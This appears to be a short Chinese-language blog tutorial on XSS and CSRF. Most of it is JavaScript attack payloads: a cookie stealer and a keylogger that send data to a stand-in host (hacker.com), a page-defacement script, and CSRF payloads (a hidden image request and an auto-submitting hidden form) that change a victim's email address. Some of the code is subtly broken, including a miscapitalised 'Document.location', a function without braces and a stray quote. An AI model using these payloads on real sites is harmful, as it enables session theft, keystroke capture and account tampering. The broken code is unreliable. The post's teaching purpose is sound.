JavaScript 惡意程式範例
這篇文章主要介紹三個JavaScript 惡意程式範例,
說明為什麼XSS是網站風險的第一名。
Cookie stealing
竊取Cookie 可以得知使用者許多使用習慣,甚至是登入的驗證 token
[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]
<script language="Javascript">
Document.location='http://www.hacker.com/cookieLogger.php?cookie='+document.cookie;
</script>[/pastacode]
Key Logger
鍵盤側錄。將使用者鍵盤輸入傳送到惡意網站。
[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]
<script>
document.onkeypress = function(e)
var img = new Image();
img.src='http://www.Hacker.com/keylogger.php?data='+e.which;
</script>
[/pastacode]
Website defacing
將網頁改寫。最常見的就是 “xxxx到此一遊”
[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]
<script>
document.body.innerHTML="<div style=visibility:visible;>
<h1>THIS WEBSITE IS UNDER ATTACK</h1>
</div>";
</script>[/pastacode]
CSRF 攻擊
如果網站用Http GET 傳送資訊,可以透過下列方式,誘導使用者傳送。
[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]
<img src=http://vulnerableapp.com/userinfo/edit.php?email=evil@attacker.com height="1" width="1"/>[/pastacode]
如果網站用Http Post 傳送資訊
[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]
<iframe style=visibility:"hidden" name="csrf-frame"></iframe>
<form name="csrf" action=""http://vulnerableapp/userinfo/edit.php" method="POST" target="csrf-frame">
<input type="hidden" name="email" value="evil@attacker.com">
<input type='submit' value='submit'>
</form>
<script>document.csrf.submit();</script>[/pastacode]